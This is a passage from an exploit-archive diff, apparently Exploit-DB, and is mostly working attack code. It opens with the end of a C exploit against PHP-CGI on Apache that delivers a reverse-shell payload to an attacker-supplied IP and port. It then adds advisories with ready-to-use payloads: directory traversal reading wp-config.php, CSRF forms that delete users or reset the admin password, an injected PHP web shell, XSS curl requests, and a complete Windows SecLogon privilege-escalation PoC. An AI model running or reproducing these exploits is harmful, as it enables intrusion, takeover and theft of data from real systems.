received = read(sockfd, &ch, 1);
if (received == 1) {
rc[count++] = ch;
count2++;
if (count2 > 1024*5)
break;
}
else
break;
}
return rc;
}
void main(int argc, char *argv[])
{
char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,
*interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;
char httpsflag=0;
unsigned short port=0, reverseport=0;
struct sockaddr_in *server;
int sockfd;
unsigned int writesize, tmpsize;
unsigned int i;
connection *sslconnection;
printf("-== Apache Magika by Kingcope ==-\n");
for(;;)
{
int c;
int option_index=0;
static struct option long_options[] = {
{"target", required_argument, 0, 0 },
{"port", required_argument, 0, 0 },
{"protocol", required_argument, 0, 0 },
{"reverse-ip", required_argument, 0, 0 },
{"reverse-port", required_argument, 0, 0 },
{"force-interpreter", required_argument, 0, 0 },
{0, 0, 0, 0 }
};
c = getopt_long(argc, argv, "", long_options, &option_index);
if (c < 0)
break;
switch (c) {
case 0:
switch (option_index) {
case 0:
if (optarg) {
target = calloc(strlen(optarg)+1, sizeof(char));
if (!target) {
printf("calloc error (2)\n");
exit(255);
}
memcpy(target, optarg, strlen(optarg)+1);
}
break;
case 1:
if(optarg)
port = atoi(optarg);
break;
case 2:
protocol = calloc(strlen(optarg)+1, sizeof(char));
if (!protocol) {
printf("calloc error (3)\n");
exit(255);
}
memcpy(protocol, optarg, strlen(optarg)+1);
if (!strcmp(protocol, "https"))
httpsflag=1;
break;
case 3:
reverseip = calloc(strlen(optarg)+1, sizeof(char));
if (!reverseip) {
printf("calloc error (4)\n");
exit(255);
}
memcpy(reverseip, optarg, strlen(optarg)+1);
break;
case 4:
reverseport = atoi(optarg);
reverseportstr = calloc(strlen(optarg)+1, sizeof(char));
if (!reverseportstr) {
printf("calloc error (5)\n");
exit(255);
}
memcpy(reverseportstr, optarg, strlen(optarg)+1);
break;
case 5:
forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));
if (!forceinterpreter) {
printf("calloc error (6)\n");
exit(255);
}
memcpy(forceinterpreter, optarg, strlen(optarg)+1);
break;
default:
usage(argv);
}
break;
default:
usage(argv);
}
}
if ((optind < argc) || !target || !protocol || !port ||
!reverseip || !reverseport){
usage(argv);
}
server = gethostbyname_(target, port);
if (!server) {
printf("Error while resolving hostname. (7)\n");
exit(255);
}
char *interpreters[5];
int ninterpreters = 5;
interpreters[0] = strdup("/cgi-bin/php");
interpreters[1] = strdup("/cgi-bin/php5");
interpreters[2] = strdup("/cgi-bin/php-cgi");
interpreters[3] = strdup("/cgi-bin/php.cgi");
interpreters[4] = strdup("/cgi-bin/php4");
for (i=0;i<ninterpreters;i++) {
interpreter = interpreters[i];
if (forceinterpreter) {
interpreter = strdup(forceinterpreter);
}
if (forceinterpreter && i)
break;
printf("%s\n", interpreter);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 1) {
printf("socket error (8)\n");
exit(255);
}
if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {
printf("connect error (9)\n");
exit(255);
}
if (httpsflag) {
sslconnection = (connection*) malloc(sizeof(connection));
if (!sslconnection) {
printf("malloc error (10)\n");
exit(255);
}
sslconnection->handle = NULL;
sslconnection->ctx = NULL;
SSL_library_init();
sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());
if (!sslconnection->ctx) {
printf("SSL_CTX_new error (11)\n");
exit(255);
}
sslconnection->handle = SSL_new(sslconnection->ctx);
if (!sslconnection->handle) {
printf("SSL_new error (12)\n");
exit(255);
}
if (!SSL_set_fd(sslconnection->handle, sockfd)) {
printf("SSL_set_fd error (13)\n");
exit(255);
}
if (SSL_connect(sslconnection->handle) != 1) {
printf("SSL_connect error (14)\n");
exit(255);
}
}
tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;
tmpstr = (char*)calloc(tmpsize, sizeof(char));
snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);
writesize = strlen(target) + strlen(interpreter) +
strlen(poststr) + strlen(tmpstr) + 64;
writestr = (char*)calloc(writesize, sizeof(char));
snprintf(writestr, writesize, poststr, interpreter,
target, strlen(tmpstr), tmpstr);
if (!httpsflag) {
write(sockfd, writestr, strlen(writestr));
readbuf = read_(sockfd);
} else {
SSL_write(sslconnection->handle, writestr, strlen(writestr));
readbuf = sslread(sslconnection);
}
if (readbuf) {
printf("***SERVER RESPONSE***\n\n%s\n\n", readbuf);
} else {
printf("read error (15)\n");
exit(255);
}
}
exit(1);
}

16
platforms/php/webapps/39575.txt Executable file
View file

@ -0,0 +1,16 @@
# Exploit Title: Wordpress eBook Download 1.1 | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/ebook-download.zip
# Version: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt
======================================
[PoC]
======================================
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
======================================

19
platforms/php/webapps/39576.txt Executable file
View file

@ -0,0 +1,19 @@
# Exploit Title: Wordpress Import CSV | Directory Traversal
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Software Link: https://downloads.wordpress.org/plugin/xml-and-csv-import-in-article-content.zip
# Stable Tag: 1.1
# Tested on: Xampp on Windows7
[Version Disclosure]
======================================
/wp-content/plugins/xml-and-csv-import-in-article-content/readme.txt
======================================
[PoC]
======================================
Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.php.
Click on the link "From an url".
In "URL" field to write "../../../wp-config.php".
Validate form and inspect the body.
======================================

27
platforms/php/webapps/39577.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
# Vulnerable File : abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
# Pics : http://i.imgur.com/jZFKYOc.png

19
platforms/php/webapps/39580.txt Executable file
View file

@ -0,0 +1,19 @@
Exploit Title: DORG - Disc Organization System SQL Injection And Cross Site Scripting
Software Link: http://www.opensourcecms.com/scripts/details.php?scriptid=479
Author: SECUPENT
Website:www.secupent.com
Email: research{at}secupent{dot}com
Date: 20-3-2016
SQL Injection:
link: http://localhost/dorg/results.php?q=3&search=%2527&type=3
Screenshot: http://secupent.com/exploit/images/drogsql.jpg
Cross Site Scripting (XSS):
link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3
Screenshot: http://secupent.com/exploit/images/drogxss.jpg

91
platforms/php/webapps/39582.txt Executable file
View file

@ -0,0 +1,91 @@
<!--
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===================================
CSRF - Arbitrary User Deletions
Vulnerability Details:
=====================
Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
users from the Xoops database.
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
=============
Following CSRF attack delete all users from database, following POC code
will sequentially delete 100 users from the Xoops application.
-->
<iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
<form target="ifrm" name='memberslist' id='CSRF' action='
http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users'
method='POST'>
<input type="hidden" id="ids" name="memberslist_id[]" />
<input type="hidden" name="fct" value="users" />
<input type="hidden" name="edit_group" value="" />
<input type="hidden" name="selgroups" value="" />
<input type="hidden" name="op" value="users_add_delete_group" />
<input type="hidden" name="op" value="action_group" />
<input type="hidden" name="Submit" value="Submit+Query" />
</form>
<script>
var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
clearInterval(si)
alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)
</script>
<!--
Disclosure Date:
==================================
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
=================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
-->

86
platforms/php/webapps/39583.txt Executable file
View file

@ -0,0 +1,86 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===========================
Directory Traversal Bypass
Vulnerability Details:
=====================
Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
==============
In Xoops code in 'protector.php' the following check is made for dot dot
slash "../" in HTTP requests
/////////////////////////////////////////////////////////////////////////////////
if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
$this->last_error_type = 'DirTraversal' ;
$this->message .= "Directory Traversal '$val' found.\n" ;
////////////////////////////////////////////////////////////////////////////////
The above Xoops directory traversal check can be defeated by using
..././..././..././..././
you can test the theory by using example below test case by supplying
..././ to GET param.
$val=$_GET['c'];
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
echo "traversal!";
}else{
echo "ok!" . $val;
}
Disclosure Date:
==================================
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
==================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.

33
platforms/php/webapps/39584.txt Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: Wordpress image-export LFD
# Date: 03/21/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: http://www.1efthander.com
# Software Link:
http://www.1efthander.com/category/wordpress-plugins/image-export
# Version: Everything is affected including latest (1.1.0 )
# Tested on: Windows/Unix on localhost
download.php file code:
<?php
if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) {
$file = $_GET['file'];
header( 'Content-Type: application/zip' );
header( 'Content-Disposition: attachment; filename="' . $file . '"' );
readfile( $file );
unlink( $file );
exit;
}
?>
Proof of concept:
Note that because of the unlink, we potentially can destroy the wordpress core.
Simply add the get parameter file:
localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php
Found by AMAR^SHG (Shkupi Hackers Group)

99
platforms/php/webapps/39586.txt Executable file
View file

@ -0,0 +1,99 @@
Advisory ID: HTB23294
Product: Dating Pro
Vendor: DatingPro
Vulnerable Version(s): Genie (2015.7) and probably prior
Tested Version: Genie (2015.7)
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 29, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: Critical
CVSSv3 Base Scores: 8.8 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H], 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple Cross-Site Request Forgery (CSRF) vulnerabilities in a popular dating social network Dating Pro.
A remote unauthenticated attacker can perform CSRF attacks to change administrators credentials and execute arbitrary system commands. Successful exploitation of the vulnerability may allow attacker to gain complete control over the vulnerable website, all its users and databases.
1) CSRF in "/admin/ausers/index"
The vulnerability exists due to the absence of validation of HTTP request origin in "/admin/ausers/index" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and change login, email address and password of the current website administrator. This means a total takeover of the website.
A simple CSRF exploit below will change login, email and password to "admin", "admin@mail.com" and "123456" respectively.
To reproduce the vulnerability, just create an empty HTML file, paste the CSRF exploit code into it, login to iTop website and open the file in your browser:
<form action="http://[host]/admin/ausers/index" method="post" name="main">
<input type="hidden" name="nickname" value="admin">
<input type="hidden" name="email" value="admin@mail.com">
<input type="hidden" name="update_password" value="1">
<input type="hidden" name="password" value="123456">
<input type="hidden" name="repassword" value="123456">
<input type="hidden" name="name" value="admin">
<input type="hidden" name="description" value="">
<input type="hidden" name="btn_save" value="Save">
<input value="submit" id="btn" type="submit" />
</form><script>document.main.submit();</script>
Now you can login as administrator using the above-mentioned credentials.
2) CSRF in /admin/notifications/settings/
The vulnerability exists due to absence of validation of HTTP request origin in "/admin/notifications/settings/" script. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and execute arbitrary system commands with privileges of the web server.
A simple exploit below will replace full path to sendmail program with the following "cp config.php config.txt" system command that will copy "config.php" file into "config.txt" making its content publicly accessible:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_charset" value="utf-8">
<input type="hidden" name="mail_protocol" value="sendmail">
<input type="hidden" name="mail_useragent" value="pg-mailer">
<input type="hidden" name="mail_from_email" value="admin@site.com">
<input type="hidden" name="mail_from_name" value="PgSoftware">
<input type="hidden" name="" value="">
<input type="hidden" name="btn_save" value="Save">
<input type="hidden" name="mail_mailpath" value="cp config.php config.txt ||">
</form><script>document.main.submit();</script>
The command will be executed the next time when any email is being sent by the vulnerable web application.
It is also possible to trigger this event using the following following CSRF exploit:
<form action="http://[host]/admin/notifications/settings/" method="post" name="main">
<input type="hidden" name="mail_to_email" value="mail@mail.com">
<input type="hidden" name="btn_test" value="Send">
</form><script>document.main.submit();</script>
-----------------------------------------------------------------------------------------------
Solution:
Update to Genie (2015.7) released after February 29, 2016.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23294 - https://www.htbridge.com/advisory/HTB23294 - Admin Password Reset & RCE via CSRF in Dating Pro
[2] Dating Pro - http://www.datingpro.com - Everything you need to start and run a dating business.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

68
platforms/php/webapps/39587.txt Executable file
View file

@ -0,0 +1,68 @@
Advisory ID: HTB23293
Product: iTop
Vendor: Combodo
Vulnerable Version(s): 2.2.1 and probably prior
Tested Version: 2.2.1
Advisory Publication: February 10, 2016 [without technical details]
Vendor Notification: February 10, 2016
Vendor Patch: February 11, 2016
Public Disclosure: March 18, 2016
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a Remote Code Execution vulnerability in iTop that is exploitable via Cross-Site Request Forgery flaw that is also present in the application. The vulnerability exists due to absence of validation of HTTP request origin in "/env-production/itop-config/config.php" script, as well as lack of user-input sanitization received via "new_config" HTTP POST parameter.
A remote unauthenticated attacker can perform CSRF attack and execute arbitrary PHP code on the vulnerable system with privileges of the web server. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary system commands on the web server, gain complete access to vulnerable web application and its databases that may contain very sensitive information.
The attacker shall create a malicious web page with CSRF exploit code, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate user, and permanently inject malicious PHP code into iTop configuration file.
CSRF exploit will inject the following PHP code into iTop configuration file:
<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>
To reproduce the vulnerability, just create an empty HTML file and paste the following CSRF exploit code into it:
<form action="http://[host]/env-production/itop-config/config.php?c%5Bmenu%5D=ConfigEditor" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="prev_config" value="1">
<input type="hidden" name="new_config" value="<? if(isset($_GET['cmd'])) die(passthru($_GET['cmd'])); ?>">
<input value="submit" id="btn" type="submit" />
</form>
Then login to iTop website with admin account and open the file in your browser.
After successful exploitation an attacker can run arbitrary system commands using the "/pages/UI.php" script. This simple PoC will execute "/bin/ls" directory listing command:
http://[host]/pages/UI.php?cmd=ls
-----------------------------------------------------------------------------------------------
Solution:
Replace the file datamodels/2.x/itop-config/config.php by the version from the appropriate revision from SVN, then run the setup again.
More Information:
https://sourceforge.net/p/itop/tickets/1202/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23293 - https://www.htbridge.com/advisory/HTB23293 - RCE via CSRF in iTop
[2] iTop - http://www.combodo.com - iTop: open source ITIL ITSM Software.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

86
platforms/php/webapps/39588.txt Executable file
View file

@ -0,0 +1,86 @@
* Exploit Title: Multiple (persistent) XSS in ProjectSend
* Discovery Date: 2016/02/19
* Public Disclosure Date: 2016/03/17
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x
* Project Homepage: http://www.projectsend.org/
* Software Link: http://www.projectsend.org/download/108/
* Version: r582
* Tested on: Ubuntu 14.04 with Firefox 45.0
* Category: webapps
Description
========================================================================
ProjectSend is a self-hosted PHP based file-transfer platform. Several serious vulnerabilities have been discovered so far (e.g. https://www.exploit-db.com/exploits/39385/). Here are some further persistent and non-persistent XSS vulnerabilities which affect ProjectSend.
PoC
========================================================================
1. Non-Persistent XSS
~~~~~~~~~~~~~~~~~~~~~~
1.1 - As client in searchbox on my_files/index.php:
curl 'http://projectsend.local.de/my_files/' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/my_files/' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E'
1.2 - As admin in searchboxes on "Manage Clients", "Clients groups" and "System Users":
curl 'http://projectsend.local.de/clients.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Connection: keep-alive' -H 'Cookie: PHPSESSID=2pgk2ehohqbqmgfr618sisqui2' -H 'Host: projectsend.local.de' -H 'Referer: http://projectsend.local.de/clients.php' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0' -H 'Content-Type: application/x-www-form-urlencoded' --data 'search=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E'
Output:
<input type="text" name="search" id="search" value=""><script>alert('XSS')</script>" class="txtfield form_actions_search_box" />
The searchboxes on "Clients groups", "System Users" and the "Recent activities log" are injectible in the same way.
2. Persistent XSS
~~~~~~~~~~~~~~~~~~
1.1 - As client in "MyAccount" field "Name":
No special vector required.
HTML output for input "><script>alert(1);</script>:
<input type="text" name="add_client_form_name" id="add_client_form_name" class="required" value=""><script>alert(1);</script>" placeholder="Will be visible on the client's file list" />
This XSS also affects admins when they open the "Clients" -> "Manage clients" page:
clients.php html output:
<td><input type="checkbox" name="selected_clients[]" value="2" /></td>
<td>"><script>alert(1);</script></td>
<td>Client1</td>
The fields "Adress" and "Telephone" are injectible in the same way.
1.2 As client in "File upload" field "Name":
A simple vector suffices: "<script>alert('XSS')</script>
The XSS is activated when admins open the dashboard (the code gets loaded from /actions-log.php via ajax) or when he accesses the "Recent activities log"
actions-log.php html output:
<td class="footable-visible">"<script>alert('XSS')</script></td>
1.3 As admin in "Groups" -> "Add new"
The fields "Name" and "Description" are injectible. The XSS is activated on the "Manage groups" page.
Simple vector: "><script>alert('XSS')</script>
Timeline
========================================================================
2016/02/19 - Issues discovered
2016/02/22 - Developed fixes for these and multiple other vulnerabilities.
Informed project maintainers
2016/03/04 - Fixes merged into master branch by project maintainers
Solution
========================================================================
Update to current version from GitHub. See https://github.com/ignacionelson/ProjectSend/issues/80 for discussion.

234
platforms/windows/local/39574.cs Executable file
View file

@ -0,0 +1,234 @@
/*
Sources:
https://bugs.chromium.org/p/project-zero/issues/detail?id=687
https://googleprojectzero.blogspot.ca/2016/03/exploiting-leaked-thread-handle.html
Windows: Secondary Logon Standard Handles Missing Sanitization EoP
Platform: Windows 8.1, Windows 10, not testing on Windows 7
Class: Elevation of Privilege
Summary:
The SecLogon service does not sanitize standard handles when creating a new process leading to duplicating a system service thread pool handle into a user accessible process. This can be used to elevate privileges to Local System.
Description:
The APIs CreateProcessWithToken and CreateProcessWithLogon are exposed to user applications, however theyre actually implemented in a system service, Secondary Logon. When these methods are called its actually dispatched over RPC to the service.
Both these methods take the normal STARTUPINFO structure and supports the passing of standard handles when the STARTF_USESTDHANDLES is used. Rather than the standard way of inheriting these handles to the new process the service copies them manually using the SlpSetStdHandles function. This does something equivalent to:
BOOL SlpSetStdHandles(HANDLE hSrcProcess, HANDLE hTargetProcess, HANDLE handles[]) {
foreach(HANDLE h : handles) {
DuplicateHandle(hSrcProcesss, h, hTargetProcess, &hNewHandle, 0, FALSE, DUPLICATE_SAME_ACCESS);
}
}
The vulnerability is nothing sanitizes these values. NtDuplicateObject special cases a couple of values for the source handle, Current Process (-1) and Current Thread (-2). NtDuplicateObject switches the threads current process to the target process when duplicating the handle, this means that while duplicating -1 will return a handle to the new process -2 will return a handle to the current thread which is actually a thread inside the svchost process hosting seclogon. When passing DUPLICATE_SAME_ACCESS for the current thread handle it's automatically given THREAD_ALL_ACCESS rights. The handle now exists in the new process and can be used by low privileged code.
This can be exploited in a number of ways. The new process can set the threads context causing the thread to dispatch to an arbitrary RIP. Or as these are thread pool threads servicing RPC requests for services such as BITS, Task Scheduler or seclogon itself you could do things like force a system level impersonation token (repeatedly) which overrides the security enforcement of these services leading to arbitrary file writes or process creation at Local System. It would be easy enough to run the exploit multiple times to capture handles to all thread pool threads available for RPC in the hosting process and then just keep trying until it succeeds.
One final point on exploitability. A normal user cannot use CreateProcessWithToken as the service checks that an arbitrary process can be opened by the user and has SeImpersonatePrivilege in its primary token. CreateProcessWithLogon will work but it seems youd need to know a users password which makes it less useful for a malicious attacker. However you can specify the LOGON_NETCREDENTIALS_ONLY flag which changes the behaviour of LogonUser, instead of needing valid credentials the password is used to change the network password of a copy of the callers token. The password can be anything you like, it doesnt matter.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile it with Any CPU support (do not set 32 bit preferred). The PoC must match the OS bitness.
1) Compile the C# source code file.
2) Execute the poc executable as a normal user. This will not work from low IL.
3) The PoC should display a message box on error or success.
Expected Result:
The call to CreateProcessWithLogon should fail and the PoC will display the error.
Observed Result:
The process shows that its captured a handle from a service process. If you check process explorer or similar youll see the thread handle has full access rights.
*/
#include <stdio.h>
#include <tchar.h>
#include <Windows.h>
#include <map>
#define MAX_PROCESSES 1000
HANDLE GetThreadHandle()
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
startInfo.hStdInput = GetCurrentThread();
startInfo.hStdOutput = GetCurrentThread();
startInfo.hStdError = GetCurrentThread();
startInfo.dwFlags = STARTF_USESTDHANDLES;
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY,
nullptr, L"cmd.exe", CREATE_SUSPENDED,
nullptr, nullptr, &startInfo, &procInfo))
{
HANDLE hThread;
BOOL res = DuplicateHandle(procInfo.hProcess, (HANDLE)0x4,
GetCurrentProcess(), &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS);
DWORD dwLastError = GetLastError();
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
if (!res)
{
printf("Error duplicating handle %d\n", dwLastError);
exit(1);
}
return hThread;
}
else
{
printf("Error: %d\n", GetLastError());
exit(1);
}
}
typedef NTSTATUS __stdcall NtImpersonateThread(HANDLE ThreadHandle,
HANDLE ThreadToImpersonate,
PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
HANDLE GetSystemToken(HANDLE hThread)
{
SuspendThread(hThread);
NtImpersonateThread* fNtImpersonateThread =
(NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"),
"NtImpersonateThread");
SECURITY_QUALITY_OF_SERVICE sqos = {};
sqos.Length = sizeof(sqos);
sqos.ImpersonationLevel = SecurityImpersonation;
SetThreadToken(&hThread, nullptr);
NTSTATUS status = fNtImpersonateThread(hThread, hThread, &sqos);
if (status != 0)
{
ResumeThread(hThread);
printf("Error impersonating thread %08X\n", status);
exit(1);
}
HANDLE hToken;
if (!OpenThreadToken(hThread, TOKEN_DUPLICATE | TOKEN_IMPERSONATE,
FALSE, &hToken))
{
printf("Error opening thread token: %d\n", GetLastError());
ResumeThread(hThread);
exit(1);
}
ResumeThread(hThread);
return hToken;
}
struct ThreadArg
{
HANDLE hThread;
HANDLE hToken;
};
DWORD CALLBACK SetTokenThread(LPVOID lpArg)
{
ThreadArg* arg = (ThreadArg*)lpArg;
while (true)
{
if (!SetThreadToken(&arg->hThread, arg->hToken))
{
printf("Error setting token: %d\n", GetLastError());
break;
}
}
return 0;
}
int main()
{
std::map<DWORD, HANDLE> thread_handles;
printf("Gathering thread handles\n");
for (int i = 0; i < MAX_PROCESSES; ++i) {
HANDLE hThread = GetThreadHandle();
DWORD dwTid = GetThreadId(hThread);
if (!dwTid)
{
printf("Handle not a thread: %d\n", GetLastError());
exit(1);
}
if (thread_handles.find(dwTid) == thread_handles.end())
{
thread_handles[dwTid] = hThread;
}
else
{
CloseHandle(hThread);
}
}
printf("Done, got %zd handles\n", thread_handles.size());
if (thread_handles.size() > 0)
{
HANDLE hToken = GetSystemToken(thread_handles.begin()->second);
printf("System Token: %p\n", hToken);
for (const auto& pair : thread_handles)
{
ThreadArg* arg = new ThreadArg;
arg->hThread = pair.second;
DuplicateToken(hToken, SecurityImpersonation, &arg->hToken);
CreateThread(nullptr, 0, SetTokenThread, arg, 0, nullptr);
}
while (true)
{
PROCESS_INFORMATION procInfo = {};
STARTUPINFO startInfo = {};
startInfo.cb = sizeof(startInfo);
if (CreateProcessWithLogonW(L"test", L"test", L"test",
LOGON_NETCREDENTIALS_ONLY, nullptr,
L"cmd.exe", CREATE_SUSPENDED, nullptr, nullptr,
&startInfo, &procInfo))
{
HANDLE hProcessToken;
// If we can't get process token good chance it's a system process.
if (!OpenProcessToken(procInfo.hProcess, MAXIMUM_ALLOWED,
&hProcessToken))
{
printf("Couldn't open process token %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
// Just to be sure let's check the process token isn't elevated.
TOKEN_ELEVATION elevation;
DWORD dwSize = 0;
if (!GetTokenInformation(hProcessToken, TokenElevation,
&elevation, sizeof(elevation), &dwSize))
{
printf("Couldn't get token elevation: %d\n", GetLastError());
ResumeThread(procInfo.hThread);
break;
}
if (elevation.TokenIsElevated)
{
printf("Created elevated process\n");
break;
}
TerminateProcess(procInfo.hProcess, 1);
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
}
}
}
return 0;
}

View file

@ -0,0 +1,94 @@
#!/usr/bin/python
